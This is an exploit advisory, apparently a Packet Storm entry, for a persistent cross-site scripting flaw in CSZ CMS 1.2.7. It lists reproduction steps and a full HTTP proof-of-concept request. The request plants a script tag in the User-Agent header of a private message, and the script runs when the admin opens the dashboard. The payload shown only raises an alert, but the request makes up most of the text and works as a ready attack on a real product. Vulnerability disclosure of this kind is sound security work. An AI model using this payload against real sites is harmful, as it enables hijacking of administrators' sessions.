Exploit for CSZ CMS 1.2.7 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:157296
# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting  
# Exploit Author: Metin Yunus Kandemir  
# Vendor Homepage: https://www.cszcms.com/  
# Software Link: https://sourceforge.net/projects/cszcms/  
# Version: v1.2.7  
# Description:  
# Unauthorized user that has access private message can embed Javascript  
# code to admin panel.  
  
# Steps to reproduce:  
1- Log in to member panel.  
1- Change user-agent header as <script>alert(1)</script>  
2- Send the private message to admin user.  
3- When admin user logs in to Backend System Dashboard, an alert box pops  
up on screen.  
  
PoC Request:  
  
POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1  
Host: localhost  
User-Agent: <script>alert(1)</script>  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 152  
Cookie: cszcookie  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send